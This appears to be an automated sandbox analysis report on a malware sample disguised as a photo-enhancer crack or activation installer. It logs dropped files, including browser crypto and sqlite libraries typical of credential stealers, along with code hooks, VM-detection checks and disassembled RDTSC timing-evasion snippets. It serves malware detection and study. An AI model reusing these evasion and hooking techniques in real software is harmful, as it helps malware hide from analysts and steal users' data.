Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: KbqArOlW06.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: KbqArOlW06.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KbqArOlW06.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: KbqArOlW06.exe

Static file information: File size 12978176 > 1048576

Source: KbqArOlW06.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc51c00

Source: KbqArOlW06.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: freebl3.dll.16.dr
Source:	Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source:	Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: KbqArOlW06.exe, ???????????????????.cs

.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Obfuscated command line found

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_00406A50 push 00406A8Dh; ret	21_2_00406A85
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_004040B5 push eax; ret	21_2_004040F1
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_00404185 push 00404391h; ret	21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_00404206 push 00404391h; ret	21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_004042E8 push 00404391h; ret	21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_00404283 push 00404391h; ret	21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_004093EC push 0040941Fh; ret	21_2_00409417
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Code function: 21_2_004085B8 push ecx; mov dword ptr [esp], eax	21_2_004085BD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00409DDC push 00409E19h; ret	22_2_00409E11
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0041A0B8 push ecx; mov dword ptr [esp], ecx	22_2_0041A0BD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00452194 push ecx; mov dword ptr [esp], eax	22_2_00452199
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004062CC push ecx; mov dword ptr [esp], eax	22_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0040A2DF push ds; ret	22_2_0040A2E0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004605AC push ecx; mov dword ptr [esp], ecx	22_2_004605B0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00458848 push 00458880h; ret	22_2_00458878
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00410970 push ecx; mov dword ptr [esp], edx	22_2_00410975
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00412DB8 push 00412E1Bh; ret	22_2_00412E13
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0040D2C8 push ecx; mov dword ptr [esp], edx	22_2_0040D2CA
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0040546D push eax; ret	22_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0040553D push 00405749h; ret	22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004055BE push 00405749h; ret	22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0040563B push 00405749h; ret	22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_004056A0 push 00405749h; ret	22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0040F828 push ecx; mov dword ptr [esp], edx	22_2_0040F82A
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00443930 push ecx; mov dword ptr [esp], ecx	22_2_00443934
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00487AF0 push ecx; mov dword ptr [esp], ecx	22_2_00487AF5
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00459B60 push 00459BA4h; ret	22_2_00459B9C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00497B18 push ecx; mov dword ptr [esp], ecx	22_2_00497B1D
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00479C7C push ecx; mov dword ptr [esp], edx	22_2_00479C7D
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00451FD0 push 00452003h; ret	22_2_00451FFB

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

22_2_00450A28

Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: section name: .2vB
Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: section name: .a\|D
Source: 2.0.0-beta2.cps.exe.0.dr	Static PE information: section name: .=xC
Source: nss3.dll.16.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.16.dr	Static PE information: section name: .didat
Source: mozglue.dll.16.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.16.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.16.dr	Static PE information: section name: .00cfg
Source: sqlite3.dll.16.dr	Static PE information: section name: /4
Source: sqlite3.dll.16.dr	Static PE information: section name: /19
Source: sqlite3.dll.16.dr	Static PE information: section name: /31
Source: sqlite3.dll.16.dr	Static PE information: section name: /45
Source: sqlite3.dll.16.dr	Static PE information: section name: /57
Source: sqlite3.dll.16.dr	Static PE information: section name: /70
Source: sqlite3.dll.16.dr	Static PE information: section name: /81
Source: sqlite3.dll.16.dr	Static PE information: section name: /92

Source: initial sample

Static PE information: section where entry point is pointing to: .=xC

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KbqArOlW06.exe	File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	File created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	File created: C:\Users\user\AppData\LocalLow\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KbqArOlW06.exe	File created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	File created: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Memory written: PID: 2332 base: 960005 value: E9 FB 99 A8 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Memory written: PID: 2332 base: 773E9A00 value: E9 0A 66 57 89	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Memory written: PID: 2332 base: 980007 value: E9 7B 4C AA 76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Memory written: PID: 2332 base: 77424C80 value: E9 8E B3 55 89	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	22_2_0042409C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	22_2_0042409C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00422CEC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	22_2_00422CEC
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0041815E IsIconic,SetWindowPos,	22_2_0041815E
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00418160 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	22_2_00418160
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0042466C IsIconic,SetActiveWindow,SetFocus,	22_2_0042466C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00424624 IsIconic,SetActiveWindow,	22_2_00424624
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00418814 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	22_2_00418814
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_0042F75C IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,	22_2_0042F75C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00417A28 IsIconic,GetCapture,	22_2_00417A28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Code function: 22_2_00485CFC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	22_2_00485CFC

Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp

Code function: 22_2_0041F5A8 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

22_2_0041F5A8

Source: C:\Users\user\Desktop\KbqArOlW06.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Special instruction interceptor: First address: 0000000000F3F96C instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	Special instruction interceptor: First address: 0000000000E151C1 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000F057DF second address: 0000000000F057EA instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000F0772D second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 test sp, 69E2h 0x00000007 cmp ebp, 35ED30BCh 0x0000000d cmc 0x0000000e sub esi, 00000008h 0x00000014 test si, bp 0x00000017 cmc 0x00000018 mov dword ptr [esi], edx 0x0000001a cmp edx, eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f xor al, 65h 0x00000021 ror al, 00000008h 0x00000024 lea edi, dword ptr [edi-00000004h] 0x0000002a add ah, FFFFFFEFh 0x0000002d shld ax, dx, 000000ADh 0x00000032 movsx eax, sp 0x00000035 mov eax, dword ptr [edi] 0x00000037 cmc 0x00000038 test dx, si 0x0000003b xor eax, ebx 0x0000003d jmp 00007F3880CC7661h 0x00000042 not eax 0x00000044 jmp 00007F3880A70423h 0x00000049 inc eax 0x0000004a jmp 00007F3880BC463Ch 0x0000004f bswap eax 0x00000051 inc eax 0x00000052 stc 0x00000053 jmp 00007F3880E3AE9Bh 0x00000058 xor ebx, eax 0x0000005a cmc 0x0000005b add ebp, eax 0x0000005d jmp 00007F3880B9D1CAh 0x00000062 jmp 00007F3880C31C8Eh 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmp esi, ecx 0x0000006d jmp 00007F3880B95358h 0x00000072 ja 00007F3880C6EB57h 0x00000078 jmp ebp 0x0000007a mov ecx, dword ptr [esi] 0x0000007c cmovnb edx, ebx 0x0000007f mov dh, 00000054h 0x00000082 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000E13F38 second address: 0000000000E13F4C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000E5AB1B second address: 0000000000E5AB29 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000E096EF second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C2CC7Ah 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880E883C8h 0x00000036 bswap eax 0x00000038 jmp 00007F3880A38857h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C1770Ch 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C7E24Eh 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880B46358h 0x0000005a jmp 00007F3880D471C3h 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880B951F8h 0x0000006a ja 00007F3880C6E9F7h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000A9EC46 second address: 0000000000A9EC5A instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000B4EE51 second address: 0000000000B4EE5F instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000BA7F6C second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C65F7Bh 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880A032B5h 0x00000036 bswap eax 0x00000038 jmp 00007F3880C9CF65h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C8C1F9h 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C32E1Ah 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880E20AC4h 0x0000005a jmp 00007F3880A1952Eh 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880CA8223h 0x0000006a ja 00007F3880D08B20h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000BEF6D9 second address: 0000000000BFEDE4 instructions: 0x00000000 rdtsc 0x00000002 test esp, edi 0x00000004 cmp ecx, 48F76367h 0x0000000a sub esi, 00000008h 0x00000010 mov dword ptr [esi], edx 0x00000012 cmc 0x00000013 test esp, 07E44ACCh 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c bt ax, 004Bh 0x00000021 rcl al, cl 0x00000023 xchg ah, al 0x00000025 lea edi, dword ptr [edi-00000004h] 0x0000002b lahf 0x0000002c mov ax, 74F3h 0x00000030 mov eax, dword ptr [edi] 0x00000032 clc 0x00000033 xor eax, ebx 0x00000035 jmp 00007F3880AC1624h 0x0000003a not eax 0x0000003c jmp 00007F3880B1F93Ah 0x00000041 inc eax 0x00000042 bswap eax 0x00000044 jmp 00007F3880DE2414h 0x00000049 inc eax 0x0000004a cmc 0x0000004b test eax, edi 0x0000004d xor ebx, eax 0x0000004f cmc 0x00000050 cmp sp, 1B06h 0x00000055 add ebp, eax 0x00000057 jmp 00007F3880A32C34h 0x0000005c jmp 00007F3880DA6E3Bh 0x00000061 lea ecx, dword ptr [esp+60h] 0x00000065 cmp esi, ecx 0x00000067 jmp 00007F3880CA80C3h 0x0000006c ja 00007F3880D089C0h 0x00000072 jmp ebp 0x00000074 mov ecx, dword ptr [esi] 0x00000076 cmovnb edx, ebx 0x00000079 mov dh, 00000054h 0x0000007c rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe	RDTSC instruction interceptor: First address: 0000000000B67EE1 second address: 0000000000B67EEC instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc

